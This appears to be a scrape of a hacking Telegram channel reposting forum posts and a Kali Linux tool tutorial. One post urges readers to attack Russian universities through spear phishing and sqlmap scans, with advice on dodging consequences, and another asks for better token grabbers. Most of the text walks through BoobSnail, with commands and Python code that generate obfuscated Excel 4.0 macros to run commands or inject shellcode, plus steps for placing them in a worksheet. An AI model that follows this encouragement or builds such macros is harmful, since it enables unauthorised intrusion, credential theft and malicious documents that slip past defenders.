Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Why Russia is the perfect country to target with hacking

There are too many Russians attacking the US and other nations, and too little of the reverse, but I believe Russia is an appealing target for the following reasons:

* Wide alternate timezone - When you come back from work in the US, it would be work time for them. They will be logged in and you could respond immediately to a successful phish. Because Russia is spans many time zones, you can find a target that fits your schedule.
* Lack of legal consequence - We all know Russia won't extradite to the US, but the same is true of the reverse. Obviously, you should still use proper opsec anyways (use VPN+Tor with Whonix).
* Less security - Russian networks tend to be less secure than their US counterparts.

If you are a beginner, I would recommend targeting universities because of their poor security and public email addresses (for spear phishing). You can find a list of Russian universities here:

http://universities.hipolabs.com/search?country=Russian%20Federation

I ran sqlmap against the list and found numerous sql injection vulnerabilities, so you can give that a try. Ultimately though, I would recommend using spear phishing. You can use Yandex translate since it's better than Google translate.

submitted by /u/VXer64
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best laptop specs for hacking?

I am going to buy a laptop with Kali or Parrot Linux and it will be dedicated to hacking. Any particular specs or ideas to pay attention to instead of the obvious “good specs” of a laptop?

submitted by /u/SPantazis
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Deep Web
If using Tor, and the built-in VPN, will I find myself in trouble for visiting underdir.com?

Title. I went to underdir.com very briefly without following the links to any of the other sites on underdir.

I'm curious if my ISP will care, or police, or anyone further down that road; and if they would care if I were to go to any of the linked sites on underdir//explore the deep web.

I'm basically just asking what's the best way to be safe, and what's legal/what's not legal.

submitted by /u/moldyharriet
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best token grabers?

I have some shit shady token grabers any recommendations for me to upgrade?

submitted by /u/Jazz_Like_Card_9975
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Where to submit hacking challenges

I have a hacking challenge with a payout of 0.02 BTC. It's in the form of a Windows x64 game.

I'm having a hard time finding a place to submit it.

Does anyone know where I could submit this challenge?

submitted by /u/cryptocomicon
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
BoobSnail : Allows Generating Excel 4.0 XLM Macro

BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

* various infection techniques;
* various obfuscation techniques;
* translation of formulas into languages other than English;
* can be used as a library – you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
. . .._
_ |_ _ |_ / / || | | \ / \ / _ | _ \ _ \ / __ \ | | |
| _\ ( <_| <_) _\ \/ \ | \/ _ | | |_
|_ /__/ ____/|_ / /| ( /|__/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(…)

Generators Usage

python boobsnail.py -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator –inputx86 –inputx64 –out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator –cmd “powershell.exe -c calc.exe” –out boobsnail.csv

Saving output in Excel

* Dump output to CSV file.
* Copy content of CSV file.
* Run Excel and create a new worksheet.
* Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
* Paste the content in cell A1 or R1C1.
* Click Data -> Text to Columns.
* Click Next -> Set Semicolon as separator and click Finish. Library Usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

* excel4lib.macro.Excel4Macro – allows to defining Excel4 formulas, values variables;
* excel4lib.macro.obfuscator.Excel4Obfuscator – allows to obfuscate created instructions in Excel4Macro;
* excel4lib.lang.Excel4Translator – allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let’s create a simple macro that runs calc.exe

from excel4lib.macro import *
#Create macro object
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())

Result:

cmd=”calc.exe”;
=EXEC(cmd);

Now let’s say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator())
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

* excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
* excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro to another language for example your native language, in my case it’s Polish. With excel4lib it’s pretty easy. You just need to import Excel4Translator class and call set_language.

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
#Change language
Excel4Translator.set_language(“pl_PL”)
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator()[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials BoobSnail : Allows Generating Excel 4.0 XLM Macro BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features: * various infection techniques; * various obfuscation…
)
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())

Result:

cmd=”calc.exe”;
=URUCHOM.PROGRAM(cmd);

For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
macro.formula(“EXEC”, exec_arg)
#Dump to CSV
print(macro.to_csv())

Result:

cmd=”calc”;
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see “.exe” string was passed to CONCATENATE formula as R2C1. R2C1 is address of “.exe” value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Column 1
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Column 2
#Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula(“EXEC”, exec_arg)
#Column 1
#Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
#GOTO EXEC call
macro.goto(exec_call)
#Dump to CSV
print(macro.to_csv())

Result:

cmd=”calc”;=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);; Download

___________________________
@hacking_Attack
@Hacking_Video